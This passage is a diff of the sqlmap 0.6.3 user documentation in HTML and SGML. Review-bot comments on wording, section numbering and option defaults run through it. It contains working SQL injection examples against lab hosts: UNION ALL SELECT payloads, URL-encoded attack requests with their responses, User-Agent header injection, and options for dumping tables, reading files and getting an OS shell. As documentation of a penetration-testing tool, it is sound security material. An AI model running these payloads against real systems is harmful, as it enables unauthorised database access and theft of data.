%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.</P>
<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Fingerprint</A>
</H2>
<H3>Extensive database management system fingerprint</H3>
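Review bot: two documentation problems in the re-homed Techniques section. `<P>TODO</P>` under `--time-test` ships as the user-facing description of an option that the help output advertises; either document it or leave the subsection out until it is written. And `Refer to the <EM>Techniques</EM> section for details on this SQL injection technique` now sits inside the Techniques section itself, so the cross-reference is circular; point it at the part of the document that actually explains inband injection, or drop it.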
@ -1779,7 +1826,7 @@ parsing library that fetches data from Chip Andrews'
<A HREF="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx">SQLSecurity.com site</A> and outputs it to the XML versions file.</P>
<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Enumeration</A>
<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">Enumeration</A>
</H2>
<H3>Banner</H3>
@ -2250,7 +2297,7 @@ databases tables, only the users' schema that the web application's user
is connected to, which is always <CODE>public</CODE>.</P>
<H3>Dump database tables entries</H3>
<H3>Dump database table entries</H3>
<P>Options: <CODE>--dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE>,
<CODE>--start</CODE> and <CODE>--stop</CODE></P>
@ -2349,8 +2396,8 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
</CODE></BLOCKQUOTE>
</P>
<P>You can also provide the <CODE>--start</CODE> and/or the <CODE>--stop</CODE> option
to limit the dump to a range of entries.</P>
<P>You can also provide the <CODE>--start</CODE> and/or the <CODE>--stop</CODE>
options to limit the dump to a range of entries.</P>
<P>
<UL>
<LI><CODE>--start</CODE> specifies the first entry to enumerate</LI>
@ -2859,7 +2906,7 @@ column names of the table then asks if the query can return multiple
entries and goes on.</P>
<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">File system access</A>
<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">File system access</A>
</H2>
<H3>Read a specific file content</H3>
@ -2867,8 +2914,8 @@ entries and goes on.</P>
<P>Option: <CODE>--read-file</CODE></P>
<P>If the back-end database management system is MySQL and the current user
has access to the <CODE>LOAD_FILE()</CODE> function, it is possible to read
the content of a specific file from the file system.</P>
has <CODE>FILE</CODE> access (access to <CODE>LOAD_FILE()</CODE> builtin function),
it is possible to read the content of a specific file from the file system.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
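Review bot: the rewording `has <CODE>FILE</CODE> access (access to <CODE>LOAD_FILE()</CODE> builtin function)` is more accurate than the old text but uses `access` twice; `has the <CODE>FILE</CODE> privilege, which the <CODE>LOAD_FILE()</CODE> built-in function requires,` says the same thing more precisely. Also `builtin` should be `built-in`.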
@ -2903,7 +2950,7 @@ inquis:x:1000:100:Bernardo Damele A. G.,,,:/home/inquis:/bin/bash
</P>
<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Operating system access</A>
<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">Operating system access</A>
</H2>
<H3>Prompt for an interactive operating system shell</H3>
@ -2941,7 +2988,7 @@ $ exit
functionalities of SQL shell.</P>
<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">Miscellaneous</A>
<H2><A NAME="ss5.9">5.9</A> <A HREF="#toc5.9">Miscellaneous</A>
</H2>
<H3>Estimated time of arrival</H3>
@ -3199,27 +3246,6 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.
</P>
<H3>Load options from a configuration INI file</H3>
<P>Option: <CODE>-c</CODE></P>
<P>It is possible to pass user's option from a configuration INI file, an
example is <CODE>sqlmap.conf</CODE>.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -c "sqlmap.conf"
[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
back-end DBMS: MySQL >= 5.0.0
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>Save options on a configuration INI file</H3>
<P>Option: <CODE>--save</CODE></P>

@ -44,10 +44,12 @@ for x86, AMD64 and Itanium too.
Optionally, if you are running sqlmap on Windows, you may wish to install
<htmlurl url="http://ipython.scipy.org/moin/PyReadline/Intro" name="PyReadline">
to be able to take advantage of the sqlmap TAB completion and history
support functionalities in the SQL shell and OS shell.
library to be able to take advantage of the sqlmap TAB completion and
history support functionalities in the SQL shell and OS shell.
Note that these functionalities are available natively by Python official
readline library on other operating systems.
You can also choose to install <htmlurl url="http://psyco.sourceforge.net/" name="Psyco">
library to speed up the sqlmap algorithmic operations.
<sect1>Scenario
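Review bot: from this file onward the commit repeats, line for line, the edits already made to README.html, this time in the linuxdoc SGML source (`<sect1>`, `<htmlurl>`); the HTML is generated from the SGML, so committing both means every wording fix is made twice and the two copies can drift. Prefer editing only the SGML and regenerating the HTML (and the binary file changed in this commit) as a build or release step. The grammar and consistency points raised on the HTML hunks apply to these hunks unchanged.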
@ -308,20 +310,25 @@ $ python sqlmap.py -h
sqlmap/0.6.3 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
Usage: sqlmap.py [options] {-u "<URL>" | -g "<google dork>" | -c "<config file>"}
Usage: sqlmap.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
Request:
These options have to be specified to set the target url, HTTP method,
how to connect to the target url or Google dorking results in general.
Target:
At least one of these options has to be specified to set the source to
get target urls from.
-u URL, --url=URL Target url
-l LIST Parse targets from Burp or WebScarab logs
-g GOOGLEDORK Process Google dork results as target urls
-p TESTPARAMETER Testable parameter(s)
-c CONFIGFILE Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target url.
--method=METHOD HTTP method, GET or POST (default: GET)
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
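Review bot: the new synopsis `Usage: sqlmap.py [options]` drops the `{-u "<URL>" | -g "<google dork>" | -c "<config file>"}` alternative, so the one-line usage no longer tells the reader that a target source is mandatory; since `-l` is now a fourth source, extend the alternative to `{-u "<URL>" | -l <LIST> | -g "<google dork>" | -c "<config file>"}` rather than removing it, and keep the Target group sentence as the longer explanation.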
@ -333,8 +340,10 @@ Options:
--proxy=PROXY Use a HTTP proxy to connect to the target url
--threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 10)
Injection:
-p TESTPARAMETER Testable parameter(s)
--string=STRING String to match in page when the query is valid
--dbms=DBMS Force back-end DBMS to this value
@ -345,11 +354,11 @@ Options:
--time-test Test for Time based blind SQL injection
--union-test Test for UNION query (inband) SQL injection
--union-use Use the UNION query (inband) SQL injection to
retrieve the queries output. No need to go blind
--union-use Use the UNION query (inband) SQL injection to retrieve
the queries output. No need to go blind
Fingerprint:
-f, --fingerprint Perform an extensive database fingerprint
-f, --fingerprint Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database
@ -398,16 +407,15 @@ Options:
Miscellaneous:
--eta Retrieve each query output length and calculate the
estimated time of arrival in real time
-v VERBOSE Verbosity level: 0-5 (default 0)
-v VERBOSE Verbosity level: 0-5 (default 1)
--update Update sqlmap to the latest stable version
-s SESSIONFILE Save and resume all data retrieved on a session file
-c CONFIGFILE Load options from a configuration INI file
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
</verb></tscreen>
<sect1>Request
<sect1>Target
<sect2>Target URL
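Review bot: the help text now states `-v VERBOSE Verbosity level: 0-5 (default 1)` where it previously said `(default 0)`, but none of the `cmdLineParser` hunks in this commit touch the `-v` option; confirm that the optparse `default=` for `-v` was actually changed to 1, otherwise the documented default and the real one diverge.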
@ -624,7 +632,7 @@ Content-Type: text/html
</verb></tscreen>
<sect2>List of targets
<sect2>Parse targets from Burp or WebScarab logs
<p>
Option: <tt>-l</tt>
@ -677,87 +685,33 @@ want to test this url? [y/N/q] y
</verb></tscreen>
<sect2>Testable parameter(s)
<sect2>Load options from a configuration INI file
<p>
Option: <tt>-p</tt>
Option: <tt>-c</tt>
<p>
By default sqlmap tests all <tt>GET</tt> parameters, <tt>POST</tt>
parameters, HTTP <tt>Cookie</tt> header values and HTTP <tt>User-Agent</tt>
header value for dynamicity and SQL injection vulnerability, but it is
possible to manually specificy the parameter(s) you want sqlmap to perform
tests on comma separeted in order to skip dynamicity tests and perform SQL
injection test and inject directly only against the provided parameter(s).
Example on a <bf>PostgreSQL 8.2.7</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "id"
[hh:mm:48] [INFO] testing connection to the target url
[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:49] [INFO] GET parameter 'id' is dynamic
[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
[...]
</verb></tscreen>
<p>
Or, if you want to provide more than one parameter, for instance:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "cat,id"
</verb></tscreen>
<p>
You can also test only the HTTP <tt>User-Agent</tt> header.
It is possible to pass user's options from a configuration INI file, an
example is <tt>sqlmap.conf</tt>.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
$ python sqlmap.py -c "sqlmap.conf"
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INFO] testing connection to the target url
[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:41] [INFO] url is stable
[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:41] [INFO] testing MySQL
[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
[hh:mm:41] [INFO] retrieved: 44
[hh:mm:41] [INFO] performed 20 queries in 0 seconds
[hh:mm:41] [INFO] confirming MySQL
[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
[hh:mm:41] [INFO] retrieved: 1
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:41] [INFO] retrieved: 4
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
back-end DBMS: MySQL >= 5.0.0
[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
back-end DBMS: MySQL >= 5.0.0
</verb></tscreen>
<p>
Note that if you also provide other options from command line, those are
evaluated when running sqlmap and overwrite the same options, if set, in
the configuration file provided.
<sect1>Request
<sect2>HTTP method: <tt>GET</tt> or <tt>POST</tt>
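Review bot: the new section says nothing about the layout of `sqlmap.conf`, and since `configFileParser` in this commit makes a `[Target]` section mandatory (with `url`, `list` and `googleDork` looked up only there, no longer under `[Request]`), anyone upgrading an existing configuration file needs to be told; one sentence listing the sections as they now mirror the option groups (Target, Request, Injection, Techniques, Fingerprint, ...) would cover it. The added note that command-line options override the same options in the file is the right thing to document.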
@ -1156,161 +1110,100 @@ It is possible to specify a number of seconds to wait between each HTTP
request. The valid value is a float, for instance 0.5.
<sect1>Techniques
<sect2>Test for Time Based Blind SQL injection
<sect2>Seconds to wait before timeout connection
<p>
Option: <tt>--time-test</tt>
Option: <tt>--timeout</tt>
<p>
TODO
It is possible to specify a number of seconds to wait before considering
the HTTP connection timed out. The valid value is a float, for instance
10.5.
<sect2>Test for UNION query SQL injection
<sect1>Injection
<sect2>Testable parameter(s)
<p>
Option: <tt>--union-test</tt>
Option: <tt>-p</tt>
<p>
It is possible to test if the target URL is affected by an <bf>inband
SQL injection</bf> vulnerability.
Refer to the <em>Techniques</em> section for details on this SQL injection
technique.
By default sqlmap tests all <tt>GET</tt> parameters, <tt>POST</tt>
parameters, HTTP <tt>Cookie</tt> header values and HTTP <tt>User-Agent</tt>
header value for dynamicity and SQL injection vulnerability, but it is
possible to manually specificy the parameter(s) you want sqlmap to perform
tests on comma separeted in order to skip dynamicity tests and perform SQL
injection test and inject directly only against the provided parameter(s).
<p>
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</verb></tscreen>
<p>
Example on a <bf>PostgreSQL 8.2.7</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "id"
[hh:mm:48] [INFO] testing connection to the target url
[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:49] [INFO] GET parameter 'id' is dynamic
[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</verb></tscreen>
<p>
As you can see, the target URL parameter <tt>id</tt> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.
<sect2>Use the UNION query SQL injection
<p>
Option: <tt>--union-use</tt>
<p>
Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
the target URL is affected by an <bf>inband SQL injection</bf>
(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <tt>SELECT</tt> queries.
<p>
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
Or, if you want to provide more than one parameter, for instance:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "cat,id"
</verb></tscreen>
<p>
As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.
You can also test only the HTTP <tt>User-Agent</tt> header.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
-p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INFO] testing connection to the target url
[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:41] [INFO] url is stable
[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:41] [INFO] testing MySQL
[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
[hh:mm:41] [INFO] retrieved: 44
[hh:mm:41] [INFO] performed 20 queries in 0 seconds
[hh:mm:41] [INFO] confirming MySQL
[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
[hh:mm:41] [INFO] retrieved: 1
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:41] [INFO] retrieved: 4
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
back-end DBMS: MySQL >= 5.0.0
</verb></tscreen>
<p>
As you can see, the MySQL <tt>version()</tt> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.
<sect1>Injection
<sect2>String match
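Review bot: the new `--timeout` paragraph says the valid value is a float such as 10.5 but omits that `__setHTTPTimeout` enforces a 3-second minimum and resets anything lower (with a warning) to 3.0; state the minimum here so a user passing `--timeout 1` is not surprised. It is also worth a sentence that the value is applied through `socket.setdefaulttimeout`, so it governs every socket sqlmap opens, including the connection to an HTTP proxy given with `--proxy`.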
@ -1510,6 +1403,160 @@ back-end database management system. If you do not know it, let sqlmap
automatically identify it for you.
<sect1>Techniques
<sect2>Test for Time Based blind SQL injection
<p>
Option: <tt>--time-test</tt>
<p>
TODO
<sect2>Test for UNION query SQL injection
<p>
Option: <tt>--union-test</tt>
<p>
It is possible to test if the target URL is affected by an <bf>inband
SQL injection</bf> vulnerability.
Refer to the <em>Techniques</em> section for details on this SQL injection
technique.
<p>
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</verb></tscreen>
<p>
Example on a <bf>PostgreSQL 8.2.7</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</verb></tscreen>
<p>
As you can see, the target URL parameter <tt>id</tt> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.
<sect2>Use the UNION query SQL injection
<p>
Option: <tt>--union-use</tt>
<p>
Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
the target URL is affected by an <bf>inband SQL injection</bf>
(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <tt>SELECT</tt> queries.
<p>
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</verb></tscreen>
<p>
As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
